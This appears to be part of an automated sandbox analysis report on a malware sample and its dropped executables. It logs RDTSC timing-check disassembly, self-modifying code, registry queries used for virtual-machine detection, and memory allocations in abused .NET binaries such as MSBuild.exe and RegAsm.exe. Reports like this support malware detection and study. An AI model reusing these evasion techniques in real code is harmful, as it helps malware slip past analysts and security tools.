Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220907 second address: 5220939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0738AFBE67h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220939 second address: 5220951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220951 second address: 522098F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0738AFBE69h 0x00000012 and si, DC66h 0x00000017 jmp 00007F0738AFBE61h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 522098F second address: 5220995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220995 second address: 52209B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52209B9 second address: 5220A28 instructions: 0x00000000 rdtsc 0x00000002 mov si, 4349h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F0738B194E6h 0x0000000d pushfd 0x0000000e jmp 00007F0738B194E2h 0x00000013 adc ecx, 1FC830C8h 0x00000019 jmp 00007F0738B194DBh 0x0000001e popfd 0x0000001f pop eax 0x00000020 popad 0x00000021 mov esi, dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov cx, 4E37h 0x0000002b pushfd 0x0000002c jmp 00007F0738B194DCh 0x00000031 adc ecx, 67CBB328h 0x00000037 jmp 00007F0738B194DBh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220A28 second address: 5220A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE64h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220A40 second address: 5220A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0738B194E2h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220A67 second address: 5220A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738AFBE5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220A79 second address: 5220A7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220A7D second address: 5220AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F0738AFBE67h 0x0000000f je 00007F07AAC81746h 0x00000015 jmp 00007F0738AFBE66h 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 jmp 00007F0738AFBE60h 0x00000026 mov ecx, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220AD9 second address: 5220ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220ADD second address: 5220AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220AFA second address: 5220B22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F07AAC9ED76h 0x0000000f pushad 0x00000010 mov esi, 362DE981h 0x00000015 mov edi, eax 0x00000017 popad 0x00000018 test byte ptr [77436968h], 00000002h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push edi 0x00000023 pop ecx 0x00000024 mov ax, dx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220B22 second address: 5220B8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0738AFBE68h 0x00000008 pop ecx 0x00000009 mov ah, bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F07AAC816C9h 0x00000014 jmp 00007F0738AFBE5Ah 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F0738AFBE5Eh 0x00000023 sub al, 00000058h 0x00000026 jmp 00007F0738AFBE5Bh 0x0000002b popfd 0x0000002c mov si, 5E0Fh 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0738AFBE5Ch 0x0000003b rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220B8B second address: 5220B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220B8F second address: 5220B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220B95 second address: 5220BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov eax, 2A340FEFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220BA9 second address: 5220BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220BAD second address: 5220BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220BBB second address: 5220C2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0738AFBE61h 0x00000009 jmp 00007F0738AFBE5Bh 0x0000000e popfd 0x0000000f push ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebx 0x00000015 jmp 00007F0738AFBE62h 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov ebx, eax 0x0000001e pushfd 0x0000001f jmp 00007F0738AFBE5Ah 0x00000024 or esi, 5A5E12D8h 0x0000002a jmp 00007F0738AFBE5Bh 0x0000002f popfd 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0738AFBE64h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220C2D second address: 5220C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, cx 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220C46 second address: 5220C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007F0738AFBE5Bh 0x0000000b and esi, 6C9127AEh 0x00000011 jmp 00007F0738AFBE69h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+14h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0738AFBE5Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220D21 second address: 5220D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5220D27 second address: 5220D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD4F52 second address: AD4F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F0738B194DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD518D second address: AD5197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0738AFBE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: AD5197 second address: AD519B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230E32 second address: 5230E38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230AB1 second address: 5230AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230AB5 second address: 5230ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230ABB second address: 5230B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F0738B194E0h 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F0738B194E1h 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F0738B194E3h 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F0738B194E5h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230B1E second address: 5230B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230B24 second address: 5230B42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0738B194E1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 5230B42 second address: 5230B57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52B07C0 second address: 52B07C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52B07C6 second address: 52B07DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738AFBE5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52B07DC second address: 52B07E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52B07E3 second address: 52B07E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52B07E9 second address: 52B0806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0738B194DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A07B7 second address: 52A081D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 87C4h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pushfd 0x00000013 jmp 00007F0738AFBE5Ch 0x00000018 sub esi, 3F0BCC78h 0x0000001e jmp 00007F0738AFBE5Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 jmp 00007F0738AFBE66h 0x0000002d mov ebp, esp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0738AFBE67h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A081D second address: 52A0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A0823 second address: 52A0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A06ED second address: 52A06F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A06F3 second address: 52A0725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A7B4h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007F0738AFBE66h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0738AFBE5Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A0725 second address: 52A0737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0738B194DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A0737 second address: 52A073B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	RDTSC instruction interceptor: First address: 52A073B second address: 52A077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d jmp 00007F0738B194E6h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0738B194E7h 0x0000001c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Special instruction interceptor: First address: 92BBEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Special instruction interceptor: First address: AC5DDF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Special instruction interceptor: First address: AF0D84 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Special instruction interceptor: First address: ADB5AE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\bUWKfj04aU.exe	Special instruction interceptor: First address: B4ED8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 4ABBEF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 645DDF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 670D84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 65B5AE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Special instruction interceptor: First address: 6CED8E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Special instruction interceptor: First address: ACCAB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Special instruction interceptor: First address: ACCB68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Special instruction interceptor: First address: CEAA4D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory allocated: FC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory allocated: 2B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2C00000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2D80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Memory allocated: 2CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Memory allocated: 4CB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Memory allocated: B00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Memory allocated: 1A5E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory allocated: B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Memory allocated: 4810000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory allocated: D20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory allocated: 2850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Memory allocated: 2660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory allocated: 27AB78C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Memory allocated: 27AD1210000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory allocated: 25579950000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Memory allocated: 2557B200000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 28F0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 6D30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 6320000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 7D30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8D30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 7430000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 9030000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: A030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Memory allocated: F20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Memory allocated: 29C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Memory allocated: 49C0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4EC0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 7460000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8460000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8930000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 9930000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 9E80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: AE80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: BE80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: CE80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 7B20000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: DE80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EE80000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8430000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 9D40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8630000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: AD40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 88B0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 9D40000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 8830000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1001084001\random.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_052A090C rdtsc

0_2_052A090C

Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597191
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596342
